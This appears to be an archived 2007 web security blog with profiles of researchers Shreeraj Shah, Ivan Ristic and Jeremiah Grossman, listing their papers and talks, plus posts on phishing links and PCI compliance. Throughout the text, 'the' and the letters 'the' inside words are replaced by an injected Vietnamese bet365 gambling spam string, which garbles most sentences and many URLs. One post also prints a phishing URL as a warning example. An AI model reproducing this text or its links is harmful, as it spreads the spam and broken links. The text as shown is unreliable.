http://www.net-square.com/whitepapers/WebServices_Info_Gacá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ring.pdf

Defending Web Services using Mod Security (Apache) Methodology and Filtering Techniques
http://www.net-square.com/whitepapers/Defending-web-services.pdf

Web Application Footprints and Discovery
http://www.net-square.com/whitepapers/WebApp_Footprints_Disco.pdf

Web application defense at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 gates - Leveraging IHttpModule
http://www.net-square.com/whitepapers/WebApp_HTTPMod.pdf

Web Services: Enumeration and Profiling
http://www.net-square.com/whitepapers/WebServices_Profiling.pdf

Domain Footprinting for Web Applications and Web Services
http://www.net-square.com/whitepapers/domain_footprints.pdf

Web Application Footprinting & Assessment with MSN Search Tricks
http://www.net-square.com/whitepapers/MSN_Search_For_WebApp.pdf

Browser Identification for Web Applications
http://www.net-square.com/whitepapers/browser_ident.pdf


Tools:-

wsChess - Toolkit for Web Services Assessments and Defense
http://www.net-square.com/wschess/index.shtml

MSNPawn - Footprinting, Profiling & Assessment with MSN Search
http://www.net-square.com/msnpawn/index.shtml

Ajaxfinger – Ajax fingerprinting script
http://www.net-square.com/ns_freetools.shtml#ajaxfinger


Presentations:-

Advanced Web Hacking - EUSecWest
http://www.slideshare.net/shreeraj/advanced-web-hacking/

Advanced Web Services Hacking - AusCERT
http://www.slideshare.net/shreeraj/advanced-web-services-hacking/

Web Services Security Chess - RSA
http://www.slideshare.net/shreeraj/web-services-security-chess-rsa/

Web Application Kung-Fu, Art of Defense - Bellua/HITB
http://www.slideshare.net/shreeraj/web-application-kungfu-art-of-defense-bellua/

Hacking and Securing .NET Apps - Infosecworld
http://www.slideshare.net/shreeraj/hacking-and-securing-net-apps-infosecworld/

Defending Web Applications: Strategies, methods and practices
http://www.archive.org/details/hitb2003-Shreeraj-Shah


Blog:-

http://shreeraj.blogspot.com


Companies worked for:-

IBM, Chase bank and Foundstone


Education:-

Masters in Computer Science


Company working for:-

Net Square Solutions Pvt. Ltd.


Email:-

shreeraj__at__net-square__dot__com

Sheeraj has come up with interesting ideas before and i am sure he has a lot more to contribute to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec industry. If you dont already follow his blog cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n I suggest you should definitely keep an eye on it.

Last Week - Ivan Ristic
Next Week - Billy Hoffman

Friday, March 02, 2007

Reflection on Ivan Ristic


If we hear so much about web application firewalls and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir role as a first line of defense in protecting our web applications, a large amount of credit has to go to Ivan Ristic. Ivan Ristic is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 creator of ModSecurity (an open source web application firewall and intrusion detection/prevention engine). He started playing in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec space sometime around 2002 and working seriously since 2004. Based out of London, UK, he is only 33 years old and works for Breach Security. He is currently in charge of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ModSecurity product line, which includes ModSecurity, sensor appliances based around it and management appliances. Ivan also wrote Apache Security for O'Reilly, a web security guide for administrators, system architects, and programmers. Prior to web application security, he has worked as a developer, system architect and technical director in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 software development industry. He shared briefly his journey with ModSecurity for us. In his own words

"I started developing web applications in 1997. At that time no one really thought about web application security. Since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 applications I worked on were sensitive, I had to deal with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n or shortly cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re after. Over time it became apparent to me that designing 100% secure web applications is simply not possible. And even pretty good security is difficult to achieve for an average programmer. The only choice cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n (and it's cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same today) was to fix applications. So cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 real choice was between having IDS (a network level tool) or a proper HTTP-level tool. Using IDS to deal with HTTP-level problems is very difficult. They will not reassemble transactions and are typically very easy to evade. On top of that most can't see into SSL traffic. So I don't really think cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re was a choice.

I started working on ModSecurity in November 2002. I came up with a beta version pretty quickly. If I recall 1.2 was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first version to be made available to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 public. But it wasn't until 1.5 that I felt comfortable enough with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 product to tell ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y can use it in production. Version 1.5 was out in May 2003. Although 1.4.2 (February 2003) was actually ready for production, version 1.5 had a web site, manual, mailing lists, etc. In ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r words cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 whole package needed for a project.

My biggest hurdle was lack of documentation for Apache and (especially) Apache 2 programming. That's where I spent most of my time in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first couple of years. Getting content interception to work in Apache 1.3.x was difficult because cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is no API in Apache 1.3.x for that purpose (so my solution is a hack). And it's been very difficult in Apache 2.0.x because cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re was no documentation and when cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re was - it was outdated. In terms of code I always worked on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 project alone. But cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 community is not only about code - I've had a lot of help from various people over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 years, in one form or anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r.

The biggest decision I made was about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 model. At cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time I was thinking of building a separate program or writing an Apache module. I am still happy with my decision (to write an Apache module) because it allowed me to focus on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 areas I really cared about. Plus it allowed me to learn a lot about Apache and that lead me to write Apache Security, which was a tremendous project on its own.

I didn't work for a security company up until 2004. In 2004 I started my own business (Thinking Stone) to support ModSecurity. Thinking Stone was subsequently bought by Breach Security in 2006. I am still working for Breach Security today. We are a web application firewall company.As for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 future of Web Application Firewall, I cannot see a world without cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m. Even if web applications magically become secure overnight, a large part of what I think WAFs do is auditing and monitoring. In ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r words - defence in depth. I don't see that need ever going away."


Ivan spends his time thinking about web intrusion detection, web application security and security patterns. When he is not working, he spends his time cooking, photography, and studying cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 English language but most of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time he ends up back in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec space. He is probably cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first to talk about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 concept of "impedance mismatch" between applications and external security layers. Below are various ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r contributions from him


Books:-

Apache Security (O'Reilly, 2005)
http://www.apachesecurity.net/
http://www.oreilly.com/catalog/apachesc/index.html


Articles:-

Software Documentation with DocBook Quick HOWTO
http://www.oreillynet.com/sysadmin/blog/2005/11/software_documentation_with_do.html

Web Security Appliance with Apache and ModSecurity
http://www.securityfocus.com/infocus/1739

ModSecurity 2.0 with Ivan Ristic
http://www.securityfocus.com/columnists/418

Introducing mod_security
http://www.onlamp.com/pub/a/apache/2003/11/26/mod_security.html

What's New in ModSecurity
http://www.onlamp.com/pub/a/apache/2005/12/01/modsecurity.html

The public life of Apache Security begins
http://www.oreillynet.com/sysadmin/blog/2005/04/cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365_public_life_of_apache_secu.html

Web Application Firewalls Primer
http://www.net-security.org/dl/insecure/INSECURE-Mag-5.pdf


Contributions:-


Presentations:-

Web Application Firewalls – When are cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y useful?
http://www.modsecurity.org/documentation/Web_Application_Firewalls_-_When_Are_They_Useful.pdf

Web Intrusion Detection with Mod Security
http://www.thinkingstone.com/talks/Web_Intrusion_Detection_with_ModSecurity.pdf

Mod Security: Embeddable Web Application Firewall
http://www.thinkingstone.com/talks/ModSecurity_Elevator_Pitch.pdf

Threat Modeling for Web Applications Deployment
http://www.thinkingstone.com/talks/Threat_Modelling.pdf

Apache Security Training
http://www.thinkingstone.com/talks/Apache_Security_Training.pdf


Memberships:-


Tools written by him:-

ModSecurity for Apache
ModSecurity Console
Apache Tools


Blog:-

http://www.modsecurity.org/blog/


Website:-

http://www.modsecurity.org/
http://www.apachesecurity.net/
http://www.ivanristic.com/


Companies worked for:-

Thinking Stone (founder)
DNS Europe
Eunet


Education:-

BSc in Computing & IT.


Email:-

ivanr__at__webkreator__dot__com

Last Week : Jeremiah Grossman
Next Week : Sheeraj Shah

Sunday, February 25, 2007

Separating actual urls hidden behind cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 link can help reduce phishing

Lately i have been getting a lot of phishing emails in my inbox. Over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 years yahoo has done a good job in redirecting those to spam folders. Of course every now and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n one or two might slip through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cracks but its only until recently when i started getting a lot of phishing emails in my inbox. Emails for washington mutual, paypal, bank of america, etc. It didnt matter if i have an account with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m or not. Luckily Over time i have developed a habit of dragging my mouse over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 link to see what is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 actual url behind cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 link. Sure enough, it was taking me to some ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r website instead of what was shown in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 link. What surprises me most is that though phishers have been using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same old method of deceiving cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 users by making cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m click on fake urls, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 industry is still trying to find all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 possible means but not separating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 actual url from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 link.

Here is an example. I received this in my yahoo mail today. If you drag your mouse over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 link, you will see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 actual url is something else as mentioned in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 link. (Be careful if you click on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 url)
https://www.paypal.com/row/vst/id=11791677P5757633F

I know its an ongoing battle between cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 product managers and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 security professionals on Where do you draw a line between a feature and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 security. Allowing a user to click on a url is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 basic feature of a html page. Html emails use cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same feature which is exploited by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 phishers and with a great success rate. The point i am trying to make here is email providers are spending a lot of money in creating a robust phishing detection mechanism but giving no attention to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 urls. How hard it is to match cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 actual url with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 text mentioned in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 link. If it doesnt match cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n based on ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r criterias it can be marked as phishing email/spam. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y dont want to mark it as phishing emails, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 least cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y can do is display cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 actual url separately from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 link and let cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user copy and paste it, if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y want to. Its not a huge inconvenience to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user but at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same timeit can help reduce phishing attempts from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malicious people.

If a phishing url could be displayed like this,

https://www.paypal.com/row/vst/id=11791677P5757633F (http://reseller4.ultrawhb.com/~mrbouble/.public/login.html)

cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n at least cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 customer is not fooled and if he copies and pastes cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 wrong url cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is no solution to that.

Friday, February 23, 2007

Reflection on Jeremiah Grossman

Today’s personality is again well known for its contribution to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world of web application security. Jeremiah Grossman is an expert in webappsec and is a CTO and a co-founder of Whitehat Security. He is also a founding member of Web Application Security Consortium. Jeremiah started hacking around 1991-92 but it was only until 2000, he took it as a profession when he was working for yahoo where he performed various web application security related activities. Over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 years he has done a lot of web application security R&D and contributed to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 community in various ways. He has spoken at numerous conferences, published a lot of articles, shared a lot of research ideas and made various ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r contributions including but not limited to Internet Security Apache Benchmark Group and Web Application Security Consortium. In his spare time he trains in Brazilian Jiu Jitsu and play australian rules football and his specialty is web application security, web development, Australian rules football and video game hacking.

Jeremiah is based out of San Jose, CA and is only 29 years old and has spoken at numerous conferences all over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world including Black Hat, ISSA, ISACA, NASA, RSA, OWASP, AFITC, Stanford and many ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r industry events. His research, writings, and discoveries have featured in USA Today, VAR Business, NBC, ABC News (AU), ZDNet, eWeek, BetaNews, etc. Below is a compilation of most of his work, which by no means, covers his entire contribution.


Articles / Books:-

Ten Things You Should Know about Web Application Security
http://www.whitehatsec.com/downloads/WP10Things.pdf

The 80/20 Rule for Web Application Security
http://www.webappsec.org/projects/articles/013105.shtml

Chasing Vulnerabilities for Fun and Profit
http://www.whitehatsec.com/articles/chasing_vulnerabilities.shtml

Myth-Busting AJAX (In)Security
http://www.whitehatsec.com/home/resources/articles/files/myth_busting_ajax_insecurity.html

Myth-Busting Web Application Buffer Overflows
http://www.whitehatsec.com/articles/mythbusting_buffer_overflow.shtml

Pay Now or Pay Later: Obtaining ROI from Web Security
http://www.cunews.com/roundtable/WhiteHat3.pdf

Technology Alone Cannot Defeat Web Application Attacks
http://searchsoftwarequality.techtarget.com/tip/0,289483,sid92_gci1189767,00.html

Insecure Web Sites
http://www.varbusiness.com/showArticle.jhtml?articleID=18825528

Thwarting SQL Web Hacks
http://www.varbusiness.com/showArticle.jhtml?articleID=18841325

Top 5 Myths of Web Application Security
http://www.varbusiness.com/showArticle.jhtml?articleID=22104030

Web Application Security 101
http://www.whitehatsec.com/articles/webappsec101.pdf

What Phishers Know That You Don't
http://www.betanews.com/article/What_Phishers_Know_That_You_Dont/1114784531

Cross-Site Scripting Worms and Viruses
http://www.whitehatsec.com/downloads/WHXSSThreats.pdf

Top 10 Web Hack of 2006
http://www.whitehatsec.com/home/resources/presentations/files/whitehat_top_hacks_06_F.pdf
Most of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 recent ones are listed here:
http://jeremiahgrossman.blogspot.com/2006/12/top-10-web-hacks-of-2006.html

Automated Scanner vs. The OWASP Top Ten
http://jeremiahgrossman.blogspot.com/2007/01/automated-scanner-vs-owasp-top-ten.html

He is also co-authoring a book on XSS to be released tentatively on March 1, 2007
Cross Site Scripting Attacks: XSS Exploits and Defense

He also wrote cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 foreword for two books:-

Preventing Web Attacks with Apache
http://www.amazon.com/Preventing-Attacks-Apache-Ryan-Barnett/dp/

Hacking Exposed Web Applications, Second Edition
http://www.amazon.com/Hacking-Exposed-Web-Applications-Second/dp/


Contributions:-


Presentations:-

Hacking Intranet Websites from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Outside (Session code: HT2-107)
http://news.thomasnet.com/companystory/506356

Hacking Intranet Websites from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 outside - "JavaScript malware just got a lot more dangerous"
http://www.blackhat.com/html/bh-usa-06/bh-usa-06-speakers.html#Grossman

Phishing with super bait
http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-grossman.pdf

Challenges of Automated Web Application Scanning
http://www.blackhat.com/presentations/bh-federal-03/bh-fed-03-grossman-up.pdf

Webserver Fingerprinting
http://www.whitehatsec.com/presentations/Black_Hat_Singapore_2002/BlackHat2002-Singapore.zip

The land that application security forgot
http://opensores.cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365bunker.net/pub/mirrors/blackhat/presentations/bh-europe-01/jeremiah-grossman/bh-europe-01-grossman.ppt

Hacking Intranet Websites from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Outside with JavaScript Malware Dang (CSI NetSec)
https://www.cmpevents.com/CSINS7/a.asp?option=C&V=11&SessID=4896

StillSecure, After all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se years, Podcast #28
http://www.stillsecureafterallcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365seyears.com/ashimmy/2007/01/episode_28_of_s.html

Cross-Site Tracing (XST)
http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf

Automated Scanners vs. Low-Hanging Fruit
http://jeremiahgrossman.blogspot.com/2007/02/automated-scanners-vs-low-hanging-fruit.html


Speaking engagements:-

Jeremiah Grossman TV interview with ABC News (AU)
http://www.youtube.com/watch?v=HPutgmAzgQA

ISSA NORCAL Systems Security Symposium 2004, Network Security Conference 2004 – Web Application Security Auditing
http://www.issa-sac.org/conferences/2004/presentations.php#

Black Hat 2006 - Hacking Intranet Websites from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Outside "JavaScript malware just got a lot more dangerous"
http://www.blackhat.com/html/bh-japan-06/bh-jp-06-en-speakers.html#Grossman

Black Hat 2005 - Phishing with Super Bait
http://www.blackhat.com/html/bh-usa-05/bh-usa-05-speakers.html#grossman

Black Hat USA 2004 - Panelist
http://www.blackhat.com/html/bh-usa-04/bh-usa-04-speakers.html

AITP Central Valley – Web Application Security http://www.whitehatsec.com/presentations/AITP_CentralValley_062004.pdf

ISSA Sacramento 2004 – Auditing Web Applications
http://www.issa-sac.org/conferences/2004/presentations.php#

Blackhat Seattle 2004
http://www.blackhat.com/presentations/bh-federal-03/bh-fed-03-grossman-up.pdf

BlackHat Windows 2003 – Hacking Web Applications Training Class, Detecting Web Application Attacks Presentation
http://www.blackhat.com/html/win-usa-03/train-bh-win-03-wh.html

Blackhat New Orleans 2002 – Web Application Security and Arsenal http://www.blackhat.com/presentations/win-usa-02/grossman-winsec2002.ppt

Blackhat Europe 2001 – Web Application Security http://www.blackhat.com/presentations/bh-europe-01/jeremiah-grossman/bh-europe-01-grossman.ppt

Air Force Information Technology Conference 2001, Web Application Security
http://www.whitehatsec.com/presentations/AFITC_2001/afitc_2001.ppt

DefCon Las Vegas 2001 – Web Application Security in Theory and Practice
http://www.whitehatsec.com/presentations/Defcon9_2001/defcon9_presentation2001.ppt

Speaker and Panelist for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Web Application Security Forum (Tokyo, Japan) - “WASC Activities and U.S. Web Application Security Trends”
http://www.whitehatsec.com/presentations/WASC_WASF_1.02.pdf

Blackhat Singapore 2002 – Web Server Fingerprinting - "A first look into web server fingerprinting"
http://www.blackhat.com/presentations/bh-asia-02/bh-asia-02-grossman.pdf

Podcast with ITRadio (Risky Business #1)
http://www.itradio.com.au/?p=6

Credit Union Information Security Conference Panelist 2004 http://www.cunews.com/infosec.htm

Washington Software Alliance 2003 / ISSA Pugeot Sound 2003 / Blackhat Federal 2003 / SuperCIO 2003 / NASA AMES 2003 – Challenges of Automated Web Application Scanning
http://www.whitehatsec.com/presentations/NASA_AMES_2003_v1.0.ppt

ISSA San Diego – Auditing Web Applications
http://www.whitehatsec.com/presentations/Auditing-Web%20Applications.pdf

ToorCon San Diego 2001 (Couldn’t find cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 url)


Proof of concepts:-

Intranet Hacking
http://jeremiahgrossman.blogspot.com/2006/09/video-hacking-intranet-websites-from.html

Browser Port Scanning without JavaScript
http://jeremiahgrossman.blogspot.com/2006/11/browser-port-scanning-without.html

Bypassing Mozilla Port Blocking
http://jeremiahgrossman.blogspot.com/2006/11/bypassing-mozilla-port-blocking.html

I know if you're logged-in, anywhere
http://jeremiahgrossman.blogspot.com/2006/12/i-know-if-youre-logged-in-anywhere.html

I know where you’ve been
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

Goodbye Applet, Hello NAT'ed IP Address
http://jeremiahgrossman.blogspot.com/2007/01/goodbye-applet-hello-nated-ip-address.html

JavaScript Array Overwriting - Advanced Web Attack Techniques using GMail
http://jeremiahgrossman.blogspot.com/2006/01/advanced-web-attack-techniques-using.html


Tools written by him:-

WhiteHat Webserver Fingerprinter (no longer available)http://www.whitehatsec.com/presentations/Black_Hat_Singapore_2002/wh_webserver_fingerprinter.tgz

Scoring Tool CIS for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Apache Benchmark
http://www.cisecurity.org/bench_apache.html

WhiteHat Arsenal (no longer available)


Memberships:-

WASC Co-Founder


Blog:-

http://jeremiahgrossman.blogspot.com


Website:-

www.whitehatsec.com


Companies worked for:-

Amgen, Yahoo, WhiteHat


Email:-

jeremiah__at__whitehatsec__dot__com


He is a man of ideas and thinks differently from ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs. His blog is amongst cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most followed blogs on information security. A must follow figure in web application security to stay current with emerging threats and news.

Last Week – RSnake
Next Week – Ivan Ristic

Tuesday, February 20, 2007

Compliance - is it worth cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 money?

While surfing through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 net i found a posting on compliance
http://bestsecurity.blogspot.com/2007/02/compliance-audit-is-not-substantive.html

Though it was more of a ranting on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 compliance but it certainly made me think my experience on PCI compliance.

I do agree that compliance has a place in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 industry. In my experience, had it not been for compliance, many companies have not paid attention towards web application security at all. Unfortunately, many of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 product managers or project managers (in big enterprises) still do not understand cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 issue of web application security (or should i say don't want to understand) and hence we see a lot of vulnerable applications out cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re. As for small and medium businesses, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sheer cost of securing web applications in itself makes cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m not go for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 solutions. Compliance in a way is forcing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m to do something about it. However, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem starts from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 governing agencies enforcing compliance. Take PCI compliance for example. It all started as a good idea to enforce companies to secure customer information but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y lost focus along cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 way. It is OK as long as you are making sure if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 network and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 applications aren't vulnerable but if you want to enforce a company to have source code audit by an independent third party, that is where it gets ridiculous.
What about companies who doesnt want to reveal cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir source code? what if it is proprietary software? Can I trust cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 company who is doing my source code audit, more importantly can I trust cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 person who is doing my source code audit? We have seen cases of hackersafe signing websites that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are safe from hackers and we have seen cases of bank's employees (who are cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 guardians of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 customer information) selling cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 very customer information to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 outside agencies. Who can I trust? Not to say what is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 guarantee that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 person doing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 source code audit has enough knowledge of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 language and more importantly where are cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 secure coding guidelines for us to follow?
The sheer cost of doing web application security compliance including black box testing, white box testing, source code analysis, web application firewall, etc, etc will run into hundreds of thousands of dollars (as we saw in RSA Conference) and not to mention cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 amount you have to pay for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 auditors.

The ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r ugly side of compliance is auditing companies. For PCI compliance, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re have been too many companies doing auditing for price ranging from $1000 to $13000. This confused me in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 beginning and I started to ask questions about what is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 value addition for that extra money and after doing a lot of research, I found out it's not about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 value addition for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 extra money, it's about saving your neck. When you can buy a compliance certificate for $1000 cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n why do you want to pay $13000. Of course, if you really are concerned about your security and want to do things cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 right way, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 price definitely will not be $1000.

I am sorry to say but compliance has become just anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r way for auditing companies to make money and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 real message has gotten lost.

Thursday, February 15, 2007

Reflection on RSnake


